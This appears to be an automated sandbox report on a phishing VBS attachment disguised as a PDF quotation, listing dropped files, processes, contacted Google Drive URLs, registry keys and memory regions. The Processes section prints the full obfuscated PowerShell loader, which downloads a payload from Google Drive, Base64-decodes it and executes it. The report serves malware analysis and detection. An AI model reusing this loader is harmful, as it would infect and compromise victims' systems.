Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
Urgent Quotation Notification_pdf.vbs
|
ASCII text, with very long lines (2129), with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
|
Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks,
0x1 compression
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jitc4mea.v5j.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qf0smckr.iuj.psm1
|
ASCII text, with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Urgent Quotation Notification_pdf.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Cantharidating Desinficerer afgrdernes Mistakenly Bunsen spadestres
#>;$Befleaing='subclans';<#Opinionsdannelserne leia Entomophthorous Hedninger #>;$Essens=$host.PrivateData;If ($Essens) {$Becollier++;}function
Fabrikskomplekserne($syngespil){$Brace66=$Frafaldendes+$syngespil.Length-$Becollier;for( $Acuserl=3;$Acuserl -lt $Brace66;$Acuserl+=4){$stevedorerne+=$syngespil[$Acuserl];}$stevedorerne;}function
Trolddomskunsternes($Pretabulation){ . ($Untenseness) ($Pretabulation);}$Plattenslager=Fabrikskomplekserne 'DimMsejoDehzsanimetlAntlE.sa
a/spi5Unr.Ga 0.ka Wax( K,WAntiPann PodRumoa awIdisAlm t N reT Me Lea1Fil0Fel.ska0si.;fje TrtW.emi G,nCry6Cla4Tan; ,p staxNot6
ra4 Il;Pe Pr r AlvTin:Nya1I t2Ou 1.mt.Bio0Ret)Ice AcGOvee Elc TokF do Mi/met2Fli0 nf1 ,h0Ren0 ta1 nd0 B 1 ar AalFsemiHalrPave
vef FioW.ax Il/Tun1As.2 ri1sna. t0Hvi ';$Unentailed=Fabrikskomplekserne ' F.U ,ns alEGr REks-sarABebg EleMa nTipTRes ';$Certifiability=Fabrikskomplekserne
' GehRe t Unt hpFe sFum:Brn/Che/OpddEjerLydi CovJaze nu.,ragA eo CaoMilg ,elB,sesha. .oc.olo,oemFed/ P.u P cNo.?Po e.etxmedpKo
o Puras.tMa =VaadFinoFngwMe.nUnll s oTe.a nodPre& igiRidd ar=,la1CluTserFTegXOnyc.fdrPreJP eWOutTD.yGPjamLysaEvic Na2Gr hElejO
r-DevV Trsm dL.aro,idWcepxDisw ,es f.sseskBi gUnoBstv1tor7M g6Gyls G. ';$Tilskringskursuset=Fabrikskomplekserne 'F.b>Lac ';$Untenseness=Fabrikskomplekserne
' UniTinEEn xDo ';$Remburserne='Kohoveder';$bakie='\Bumpenes.sam';Trolddomskunsternes (Fabrikskomplekserne 'Tre$ Teg mbl
Hao mmb anaLomlsk :EndDFesuvoltFr,itr.aVacb Bll eePo =Mon$ lae Pan upvPre:Ka as,mpMisp CodOrdaRaatBaraTek+ De$EkkbD aa rak
uniBroeO d ');Trolddomskunsternes (Fabrikskomplekserne 'Tan$,ksgD al FooAnnbBl a Hylpha: KaP Torpolel,di Almbelp vo ndrGartBle=sup$LimC
eveprorApptsayiza f ai .kaFisbFaliOrnlChaiHyptWriyTen.CarsProp MilTeli ExtP l(Pai$PraTd.wivesl O.s HuksamrFo iCaln Zog scstilkPosuB.drs
tsBa u TosPr.e aftBla)B l ');Trolddomskunsternes (Fabrikskomplekserne 'Mol[.erN.ocePret.tu.Angs tre,iarsmevHumiFe cgrues,rP
ao lmiLevnDeft MoMsu aCasn ska olgslieB.yrAdn] Wr:Gth:BrssFree T cUnmu,anrYppi nttsvey InPChirbriostitOutoRifcMejotyrl Fo
Bof= st ,ys[In.NUboeD.rtTpp.s ossofeOvecUnduN,tr Fri et ubyAfvPBjerKofoKretUnaowitcMatoKinlskrTGluyskipPosesal]A i: ej:Y
uT oclObjs Kv1sym2Mas ');$Certifiability=$Preimport[0];$Fortolke=(Fabrikskomplekserne ' re$BlagstaLsano arBMulasjkLKon:GenC
BrhMo,a.nnN asn,ndiPoleLe.=ComNb teHooW .i-sp osneBUdnjacce asCArkTKas UbesB uYCams CeTMune dsMTra.sp,nmisEposT De. nowBereNonb
LycNonl,isIBrieHusN Hjtopf ');Trolddomskunsternes ($Fortolke);Trolddomskunsternes (Fabrikskomplekserne 'lug$,nkCHyphPreaEnenBa.ns,ei
MieAnt.VivHK,nes raAt,d GyeC xr UdsFel[ st$NynULymnFleeIn.n ontRe aUnoi AclBeeeFord Ac]Ani=sk $TrkPUrelsataFe.tBentinteKg.n
ytsicilIrras,igDrme CerHol ');$Bufferkapaciteterne=Fabrikskomplekserne 'Unp$ DaCDeph.araBilnCoan raiInteD,m.UndDstao riwse,nU.plMuso
taaR td .nFRddi llskye l(Mal$tunCIndeT.ar ottKomiC nf aiDraaa ob ckiAcilUnniTartUnfyske, no$RatP crrPraoOffsD etKvah anoKondBaaosprnstitOphi
occ msAlt) ed ';$Prosthodontics=$Dutiable;Trolddomskunsternes (Fabrikskomplekserne 'Mil$Oveg BalHngoFotbPrma oL Pr:,acs stI
.hdCouOundN snIMa a B sH,u= En( CotHjuesttsUnsTExi-KispRaaaCout skHRag Ebu$,omP ierK.io HusLant enHT kOTredD rO Brnsk,TAutIUn
c PasHa,) Re ');while (!$sidonias) {Trolddomskunsternes (Fabrikskomplekserne ' K $Gafghkels ioPolbIntasinl.el:El U Dossvrl
stiTign TigEtheMk,nUn s Kl=To $stot erM au sye Af ') ;Trolddomskunsternes $Bufferkapaciteterne;Trolddomskunsternes (Fabrikskomplekserne
'V lssoat MiaMatrBettf,j-WatsNislsike svePlepFas Epi4Chi ');Trolddomskunsternes (Fabrikskomplekserne 'F g$P.rgC llGaloHarb
C.aItal Fo: G.sBloiHypd aso A,n,tai Nua OvsDem=Clu( ,rTD teAn seartFll-WogPId,aUndtn th su Ild$UnsPCl rBetosprsMyttslah o,oLordUbeoKupnGrotO
eiKo cTrisG i)Kah ') ;Trolddomskunsternes (Fabrikskomplekserne 'squ$Audg EilB.aoBorbFesaIn lFac: coOs.rrAf tDewhP ro MacKape
dsrE.ta FltKeliIsotErki llc ro= k$ U gse l s os jb osa llBow: UnU Kanra dWeaeBharslucTrarundoPlasVissZoni PsnMedgjus+Bi,+
Al% yp$B sP esrHareForiEvim ncpOpsostar Retdat.HvicDrno FiuI pnReotRec ') ;$Certifiability=$Preimport[$Orthoceratitic];}$Vejlenser=275493;$Cirkelines=30624;Trolddomskunsternes
(Fabrikskomplekserne 'For$ FegtimlBraoKilbGolaOlalTo.:s nM ElaCorsHelsOveeWeitsm eOver PriFascpep Tra=Epi AnGRapesemtMus-HovCMauoho,nRevt
steVinnAcatMel B r$tykPQu,r.haoBlusB at Rah CyoFlidsuioPron hltO,ei stc isLyk ');Trolddomskunsternes (Fabrikskomplekserne
'Ine$AlagGtel,enoHygb MraNeglClo:CanIdiansolfTr i PrnChaisrktUn.aBehtAfseP ad su l=N g ,jl[Be s,awyChisTuntsl,eNydm sp.
ArCvero usnNonvFuteA.erAt tper]ski:Vej:TofFLetrKomoPremVarBEntaUdtsElseFes6 lu4 B sstitcsnrfugistrnsvegDri(Fra$UnsMKisaTassTo.sBraeWhatNyaes.orMusi
ascVer) Bo ');Trolddomskunsternes (Fabrikskomplekserne ' dr$BefgsvilHeao ocb p.aBealZi :Un MR ko HyncesiUn s,ontPeli Fos R
kOl e .v D g=dor Xip[UdhsV zyGuasB ktPhyeRapmObj.st TFo,e Rux tetGra. MoEMisn Glcstao ldD ni stnFusgbor]ent:kom: emAn nsBasCHe
It aIGon. G,GItae sttAl,sburtJusr M.iUdsns mg e( As$ aIK in opfBini.efnsemiflet EfaUndt laesmud.in) Dr ');Trolddomskunsternes
(Fabrikskomplekserne 'Brb$D,igB nlPreoHurb,oraRealUni: rTAngrTrao K,u Mev,oie rluPyrrGarsodi1 In5Me,6,ct=sol$AllMB yo O n
I i.yrss otNseibagsAp.kopbeMoo. ndsAp usaubin sDiatVanr BoiHosnTe.gAfr(Cra$ProVsyne OdjKonlHjee.ilnDe sToge Norsat,afh$damC
W iGe r Miksoge L lGauiBranjobeIn s as)Pen ');Trolddomskunsternes $Trouveurs156;"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://www.google.com
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://drive.usercontent.google.com
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://drive.usercontent.google.com(
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://drive.googP
|
unknown
|
||
|
http://cacerts.digi
|
unknown
|
||
|
https://drive.google.com
|
unknown
|
||
|
https://drive.usercontent.googh
|
unknown
|
||
|
https://drive.usercontent.google.com
|
unknown
|
||
|
http://drive.google.com
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://apis.google.com
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
There are 10 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
bg.microsoft.map.fastly.net
|
199.232.214.172
|
||
|
drive.google.com
|
142.250.186.174
|
||
|
drive.usercontent.google.com
|
142.250.186.33
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
142.250.186.174
|
drive.google.com
|
United States
|
||
|
142.250.186.33
|
drive.usercontent.google.com
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 4 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
1943386F000
|
heap
|
page read and write
|
||
|
1D676DFD000
|
heap
|
page read and write
|
||
|
1D600EB6000
|
trusted library allocation
|
page read and write
|
||
|
1D6765A1000
|
heap
|
page read and write
|
||
|
1D610010000
|
trusted library allocation
|
page read and write
|
||
|
19433893000
|
heap
|
page read and write
|
||
|
3477A3F000
|
stack
|
page read and write
|
||
|
194358CD000
|
heap
|
page read and write
|
||
|
7FF886F70000
|
trusted library allocation
|
page execute and read and write
|
||
|
1D601537000
|
trusted library allocation
|
page read and write
|
||
|
5FBA8FE000
|
stack
|
page read and write
|
||
|
19433916000
|
heap
|
page read and write
|
||
|
1D6004D6000
|
trusted library allocation
|
page read and write
|
||
|
194338C2000
|
heap
|
page read and write
|
||
|
1D674C10000
|
heap
|
page read and write
|
||
|
7FF887020000
|
trusted library allocation
|
page read and write
|
||
|
194358A6000
|
heap
|
page read and write
|
||
|
1943575A000
|
heap
|
page read and write
|
||
|
194359AB000
|
heap
|
page read and write
|
||
|
1D600EC6000
|
trusted library allocation
|
page read and write
|
||
|
19435A05000
|
heap
|
page read and write
|
||
|
194358D6000
|
heap
|
page read and write
|
||
|
1D676BA0000
|
heap
|
page execute and read and write
|
||
|
194358DE000
|
heap
|
page read and write
|
||
|
7FF886D80000
|
trusted library allocation
|
page read and write
|
||
|
194338E4000
|
heap
|
page read and write
|
||
|
1D60154F000
|
trusted library allocation
|
page read and write
|
||
|
1D6764E0000
|
trusted library allocation
|
page read and write
|
||
|
1D600EBE000
|
trusted library allocation
|
page read and write
|
||
|
19435957000
|
heap
|
page read and write
|
||
|
7FF886E3C000
|
trusted library allocation
|
page execute and read and write
|
||
|
347797E000
|
stack
|
page read and write
|
||
|
194338ED000
|
heap
|
page read and write
|
||
|
7FF8870D0000
|
trusted library allocation
|
page read and write
|
||
|
7FF886D9B000
|
trusted library allocation
|
page read and write
|
||
|
1D60161B000
|
trusted library allocation
|
page read and write
|
||
|
1D674B26000
|
heap
|
page read and write
|
||
|
194358DA000
|
heap
|
page read and write
|
||
|
194338C4000
|
heap
|
page read and write
|
||
|
1D601C4F000
|
trusted library allocation
|
page read and write
|
||
|
194358B9000
|
heap
|
page read and write
|
||
|
1D600EA6000
|
trusted library allocation
|
page read and write
|
||
|
1D6004F7000
|
trusted library allocation
|
page read and write
|
||
|
1D600B40000
|
trusted library allocation
|
page read and write
|
||
|
194358C4000
|
heap
|
page read and write
|
||
|
7FF886D82000
|
trusted library allocation
|
page read and write
|
||
|
3477343000
|
stack
|
page read and write
|
||
|
19433A9B000
|
heap
|
page read and write
|
||
|
3477CBE000
|
stack
|
page read and write
|
||
|
1D600226000
|
trusted library allocation
|
page read and write
|
||
|
1D600084000
|
trusted library allocation
|
page read and write
|
||
|
194358AC000
|
heap
|
page read and write
|
||
|
7FF886F3A000
|
trusted library allocation
|
page read and write
|
||
|
194337E0000
|
heap
|
page read and write
|
||
|
19433858000
|
heap
|
page read and write
|
||
|
3478909000
|
stack
|
page read and write
|
||
|
19435865000
|
heap
|
page read and write
|
||
|
1D676C00000
|
heap
|
page read and write
|
||
|
194358C7000
|
heap
|
page read and write
|
||
|
3477BB8000
|
stack
|
page read and write
|
||
|
1D601C38000
|
trusted library allocation
|
page read and write
|
||
|
1943587A000
|
heap
|
page read and write
|
||
|
1D600489000
|
trusted library allocation
|
page read and write
|
||
|
1D601C5A000
|
trusted library allocation
|
page read and write
|
||
|
7FF886F80000
|
trusted library allocation
|
page read and write
|
||
|
1D676C83000
|
heap
|
page read and write
|
||
|
7FF886FA0000
|
trusted library allocation
|
page read and write
|
||
|
7FF886FD0000
|
trusted library allocation
|
page read and write
|
||
|
19433916000
|
heap
|
page read and write
|
||
|
5FBA5FC000
|
stack
|
page read and write
|
||
|
5FBA3FF000
|
stack
|
page read and write
|
||
|
194358C1000
|
heap
|
page read and write
|
||
|
1D6004DB000
|
trusted library allocation
|
page read and write
|
||
|
1D6004F3000
|
trusted library allocation
|
page read and write
|
||
|
7FF886D84000
|
trusted library allocation
|
page read and write
|
||
|
1D600974000
|
trusted library allocation
|
page read and write
|
||
|
1D601648000
|
trusted library allocation
|
page read and write
|
||
|
5FBA4FE000
|
stack
|
page read and write
|
||
|
7FF887010000
|
trusted library allocation
|
page read and write
|
||
|
7FF887080000
|
trusted library allocation
|
page read and write
|
||
|
1D674B74000
|
heap
|
page read and write
|
||
|
19435951000
|
heap
|
page read and write
|
||
|
7FF886D90000
|
trusted library allocation
|
page read and write
|
||
|
7FF886F40000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF8870B0000
|
trusted library allocation
|
page read and write
|
||
|
1D676A95000
|
heap
|
page read and write
|
||
|
3477B38000
|
stack
|
page read and write
|
||
|
3477D3E000
|
stack
|
page read and write
|
||
|
19433916000
|
heap
|
page read and write
|
||
|
1943386E000
|
heap
|
page read and write
|
||
|
19433859000
|
heap
|
page read and write
|
||
|
7FF886DAD000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF887070000
|
trusted library allocation
|
page read and write
|
||
|
3477E3B000
|
stack
|
page read and write
|
||
|
19433878000
|
heap
|
page read and write
|
||
|
194358AD000
|
heap
|
page read and write
|
||
|
194358C7000
|
heap
|
page read and write
|
||
|
19435967000
|
heap
|
page read and write
|
||
|
1D601151000
|
trusted library allocation
|
page read and write
|
||
|
1D601C3C000
|
trusted library allocation
|
page read and write
|
||
|
19435752000
|
heap
|
page read and write
|
||
|
1D676E3F000
|
heap
|
page read and write
|
||
|
194358AD000
|
heap
|
page read and write
|
||
|
19435750000
|
heap
|
page read and write
|
||
|
1D60172E000
|
trusted library allocation
|
page read and write
|
||
|
194358C1000
|
heap
|
page read and write
|
||
|
194338C4000
|
heap
|
page read and write
|
||
|
194358C7000
|
heap
|
page read and write
|
||
|
7DF43C150000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF886F62000
|
trusted library allocation
|
page read and write
|
||
|
1D676AAF000
|
heap
|
page read and write
|
||
|
34787B8000
|
stack
|
page read and write
|
||
|
1943575A000
|
heap
|
page read and write
|
||
|
194358B9000
|
heap
|
page read and write
|
||
|
194358D4000
|
heap
|
page read and write
|
||
|
1D676420000
|
trusted library section
|
page read and write
|
||
|
1D674A00000
|
heap
|
page read and write
|
||
|
194359CF000
|
heap
|
page read and write
|
||
|
194338E4000
|
heap
|
page read and write
|
||
|
1D674C60000
|
heap
|
page read and write
|
||
|
19435963000
|
heap
|
page read and write
|
||
|
1D60179A000
|
trusted library allocation
|
page read and write
|
||
|
19435752000
|
heap
|
page read and write
|
||
|
1D601C5E000
|
trusted library allocation
|
page read and write
|
||
|
19435751000
|
heap
|
page read and write
|
||
|
19435975000
|
heap
|
page read and write
|
||
|
1D676BC0000
|
trusted library allocation
|
page read and write
|
||
|
347777E000
|
stack
|
page read and write
|
||
|
19435963000
|
heap
|
page read and write
|
||
|
1D6102FD000
|
trusted library allocation
|
page read and write
|
||
|
347888D000
|
stack
|
page read and write
|
||
|
19433916000
|
heap
|
page read and write
|
||
|
1D600EC2000
|
trusted library allocation
|
page read and write
|
||
|
1D676A90000
|
heap
|
page read and write
|
||
|
19433A98000
|
heap
|
page read and write
|
||
|
1D676E35000
|
heap
|
page read and write
|
||
|
194338D1000
|
heap
|
page read and write
|
||
|
19435898000
|
heap
|
page read and write
|
||
|
5FBAAFB000
|
stack
|
page read and write
|
||
|
19435863000
|
heap
|
page read and write
|
||
|
194358C1000
|
heap
|
page read and write
|
||
|
19435898000
|
heap
|
page read and write
|
||
|
1D676E0D000
|
heap
|
page read and write
|
||
|
7FF886E30000
|
trusted library allocation
|
page read and write
|
||
|
7FF886DA0000
|
trusted library allocation
|
page read and write
|
||
|
194358B4000
|
heap
|
page read and write
|
||
|
1D6004CE000
|
trusted library allocation
|
page read and write
|
||
|
7FF886FB0000
|
trusted library allocation
|
page read and write
|
||
|
7FF886D83000
|
trusted library allocation
|
page execute and read and write
|
||
|
1D676AE7000
|
heap
|
page read and write
|
||
|
1D676AE9000
|
heap
|
page read and write
|
||
|
1D600EAA000
|
trusted library allocation
|
page read and write
|
||
|
1D674B54000
|
heap
|
page read and write
|
||
|
7FF887060000
|
trusted library allocation
|
page read and write
|
||
|
194358D1000
|
heap
|
page read and write
|
||
|
19435963000
|
heap
|
page read and write
|
||
|
19435951000
|
heap
|
page read and write
|
||
|
194358C7000
|
heap
|
page read and write
|
||
|
194359AA000
|
heap
|
page read and write
|
||
|
1D601666000
|
trusted library allocation
|
page read and write
|
||
|
1943591E000
|
heap
|
page read and write
|
||
|
7FF886EA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
194358C7000
|
heap
|
page read and write
|
||
|
194358A6000
|
heap
|
page read and write
|
||
|
19435962000
|
heap
|
page read and write
|
||
|
1D601C62000
|
trusted library allocation
|
page read and write
|
||
|
1D601855000
|
trusted library allocation
|
page read and write
|
||
|
3477DBE000
|
stack
|
page read and write
|
||
|
7FF886F90000
|
trusted library allocation
|
page read and write
|
||
|
1D6004EB000
|
trusted library allocation
|
page read and write
|
||
|
7FF886F50000
|
trusted library allocation
|
page execute and read and write
|
||
|
19433A95000
|
heap
|
page read and write
|
||
|
1D600EAE000
|
trusted library allocation
|
page read and write
|
||
|
194358B9000
|
heap
|
page read and write
|
||
|
7FF887050000
|
trusted library allocation
|
page read and write
|
||
|
1943595D000
|
heap
|
page read and write
|
||
|
1943595B000
|
heap
|
page read and write
|
||
|
1D676470000
|
trusted library allocation
|
page read and write
|
||
|
1D60102B000
|
trusted library allocation
|
page read and write
|
||
|
19433916000
|
heap
|
page read and write
|
||
|
19435871000
|
heap
|
page read and write
|
||
|
1D600E31000
|
trusted library allocation
|
page read and write
|
||
|
1D601C74000
|
trusted library allocation
|
page read and write
|
||
|
7FF887090000
|
trusted library allocation
|
page read and write
|
||
|
1D600ECE000
|
trusted library allocation
|
page read and write
|
||
|
7FF8870C0000
|
trusted library allocation
|
page read and write
|
||
|
194338ED000
|
heap
|
page read and write
|
||
|
1943388F000
|
heap
|
page read and write
|
||
|
1D600D75000
|
trusted library allocation
|
page read and write
|
||
|
7FF886D8D000
|
trusted library allocation
|
page execute and read and write
|
||
|
1D60110C000
|
trusted library allocation
|
page read and write
|
||
|
19435977000
|
heap
|
page read and write
|
||
|
1D676580000
|
heap
|
page read and write
|
||
|
1943595D000
|
heap
|
page read and write
|
||
|
1D674C65000
|
heap
|
page read and write
|
||
|
194338E7000
|
heap
|
page read and write
|
||
|
1D674BFE000
|
heap
|
page read and write
|
||
|
1D60115E000
|
trusted library allocation
|
page read and write
|
||
|
1D674B9C000
|
heap
|
page read and write
|
||
|
1D600EBA000
|
trusted library allocation
|
page read and write
|
||
|
1D674C40000
|
heap
|
page read and write
|
||
|
19433A80000
|
remote allocation
|
page read and write
|
||
|
19435756000
|
heap
|
page read and write
|
||
|
7FF886F20000
|
trusted library allocation
|
page read and write
|
||
|
1D6004EF000
|
trusted library allocation
|
page read and write
|
||
|
7FF886E66000
|
trusted library allocation
|
page execute and read and write
|
||
|
1D674B10000
|
heap
|
page read and write
|
||
|
1D600ED2000
|
trusted library allocation
|
page read and write
|
||
|
1D676450000
|
trusted library allocation
|
page read and write
|
||
|
1D601159000
|
trusted library allocation
|
page read and write
|
||
|
1D6764A0000
|
trusted library allocation
|
page read and write
|
||
|
19435751000
|
heap
|
page read and write
|
||
|
194358C7000
|
heap
|
page read and write
|
||
|
1D674B1C000
|
heap
|
page read and write
|
||
|
1D6004D2000
|
trusted library allocation
|
page read and write
|
||
|
194337B0000
|
heap
|
page read and write
|
||
|
19435400000
|
heap
|
page read and write
|
||
|
1D600ECA000
|
trusted library allocation
|
page read and write
|
||
|
194338EE000
|
heap
|
page read and write
|
||
|
1943575A000
|
heap
|
page read and write
|
||
|
347880E000
|
stack
|
page read and write
|
||
|
19435854000
|
heap
|
page read and write
|
||
|
1D6101B7000
|
trusted library allocation
|
page read and write
|
||
|
19435944000
|
heap
|
page read and write
|
||
|
1D600491000
|
trusted library allocation
|
page read and write
|
||
|
1D600437000
|
trusted library allocation
|
page read and write
|
||
|
194358C1000
|
heap
|
page read and write
|
||
|
194358B9000
|
heap
|
page read and write
|
||
|
19433A80000
|
remote allocation
|
page read and write
|
||
|
1D601DC4000
|
trusted library allocation
|
page read and write
|
||
|
1D676430000
|
trusted library allocation
|
page read and write
|
||
|
194358AC000
|
heap
|
page read and write
|
||
|
1D60047E000
|
trusted library allocation
|
page read and write
|
||
|
1D6005E1000
|
trusted library allocation
|
page read and write
|
||
|
1D676597000
|
heap
|
page read and write
|
||
|
7FF886FF0000
|
trusted library allocation
|
page read and write
|
||
|
1D60186A000
|
trusted library allocation
|
page read and write
|
||
|
7FF8870A0000
|
trusted library allocation
|
page read and write
|
||
|
1943596C000
|
heap
|
page read and write
|
||
|
1D676C50000
|
heap
|
page execute and read and write
|
||
|
1D601C52000
|
trusted library allocation
|
page read and write
|
||
|
1943595A000
|
heap
|
page read and write
|
||
|
1D601CC9000
|
trusted library allocation
|
page read and write
|
||
|
7FF886E36000
|
trusted library allocation
|
page read and write
|
||
|
1D600F50000
|
trusted library allocation
|
page read and write
|
||
|
194358B9000
|
heap
|
page read and write
|
||
|
19435867000
|
heap
|
page read and write
|
||
|
1D601CCD000
|
trusted library allocation
|
page read and write
|
||
|
1D6004DF000
|
trusted library allocation
|
page read and write
|
||
|
19433878000
|
heap
|
page read and write
|
||
|
194358DC000
|
heap
|
page read and write
|
||
|
5FB9D99000
|
stack
|
page read and write
|
||
|
1D601165000
|
trusted library allocation
|
page read and write
|
||
|
1943596E000
|
heap
|
page read and write
|
||
|
1D676460000
|
heap
|
page readonly
|
||
|
19435851000
|
heap
|
page read and write
|
||
|
1D6016ED000
|
trusted library allocation
|
page read and write
|
||
|
1D676C57000
|
heap
|
page execute and read and write
|
||
|
194358D4000
|
heap
|
page read and write
|
||
|
19433906000
|
heap
|
page read and write
|
||
|
19435898000
|
heap
|
page read and write
|
||
|
1D676B5F000
|
heap
|
page read and write
|
||
|
7FF886FC0000
|
trusted library allocation
|
page read and write
|
||
|
5FBA7FE000
|
stack
|
page read and write
|
||
|
1D676AB9000
|
heap
|
page read and write
|
||
|
19433910000
|
heap
|
page read and write
|
||
|
7FF8870F0000
|
trusted library allocation
|
page read and write
|
||
|
1D6017D6000
|
trusted library allocation
|
page read and write
|
||
|
1D674BA3000
|
heap
|
page read and write
|
||
|
1D6004E3000
|
trusted library allocation
|
page read and write
|
||
|
19433916000
|
heap
|
page read and write
|
||
|
194358C4000
|
heap
|
page read and write
|
||
|
7FF887040000
|
trusted library allocation
|
page read and write
|
||
|
1D60071F000
|
trusted library allocation
|
page read and write
|
||
|
1D676B76000
|
heap
|
page read and write
|
||
|
1D600F60000
|
trusted library allocation
|
page read and write
|
||
|
1D60048D000
|
trusted library allocation
|
page read and write
|
||
|
1D600EB2000
|
trusted library allocation
|
page read and write
|
||
|
7FF887000000
|
trusted library allocation
|
page read and write
|
||
|
1D600A02000
|
trusted library allocation
|
page read and write
|
||
|
1D676D60000
|
heap
|
page read and write
|
||
|
19435950000
|
heap
|
page read and write
|
||
|
194358F1000
|
heap
|
page read and write
|
||
|
194358C1000
|
heap
|
page read and write
|
||
|
1D601679000
|
trusted library allocation
|
page read and write
|
||
|
1D6004E7000
|
trusted library allocation
|
page read and write
|
||
|
194338C2000
|
heap
|
page read and write
|
||
|
7FF886DDC000
|
trusted library allocation
|
page execute and read and write
|
||
|
1D676590000
|
heap
|
page read and write
|
||
|
194358C4000
|
heap
|
page read and write
|
||
|
34779F8000
|
stack
|
page read and write
|
||
|
19435888000
|
heap
|
page read and write
|
||
|
194359FB000
|
heap
|
page read and write
|
||
|
1D676410000
|
trusted library section
|
page read and write
|
||
|
5FBA6FB000
|
stack
|
page read and write
|
||
|
194358B9000
|
heap
|
page read and write
|
||
|
194338C4000
|
heap
|
page read and write
|
||
|
7FF886E40000
|
trusted library allocation
|
page execute and read and write
|
||
|
1943595D000
|
heap
|
page read and write
|
||
|
194358A9000
|
heap
|
page read and write
|
||
|
194338C2000
|
heap
|
page read and write
|
||
|
194358A6000
|
heap
|
page read and write
|
||
|
194358E0000
|
heap
|
page read and write
|
||
|
1D674AE0000
|
heap
|
page read and write
|
||
|
1D60167B000
|
trusted library allocation
|
page read and write
|
||
|
1D6017B5000
|
trusted library allocation
|
page read and write
|
||
|
19433A80000
|
remote allocation
|
page read and write
|
||
|
1D60049D000
|
trusted library allocation
|
page read and write
|
||
|
1D674B60000
|
heap
|
page read and write
|
||
|
19433A90000
|
heap
|
page read and write
|
||
|
1D676D9F000
|
heap
|
page read and write
|
||
|
194338D1000
|
heap
|
page read and write
|
||
|
5FBA1FE000
|
stack
|
page read and write
|
||
|
19433A98000
|
heap
|
page read and write
|
||
|
7FF8870E0000
|
trusted library allocation
|
page read and write
|
||
|
1D676C80000
|
heap
|
page read and write
|
||
|
7FF886FE0000
|
trusted library allocation
|
page read and write
|
||
|
1D600001000
|
trusted library allocation
|
page read and write
|
||
|
19435850000
|
heap
|
page read and write
|
||
|
1D60175D000
|
trusted library allocation
|
page read and write
|
||
|
1D676BC3000
|
trusted library allocation
|
page read and write
|
||
|
1D601C8F000
|
trusted library allocation
|
page read and write
|
||
|
34777FC000
|
stack
|
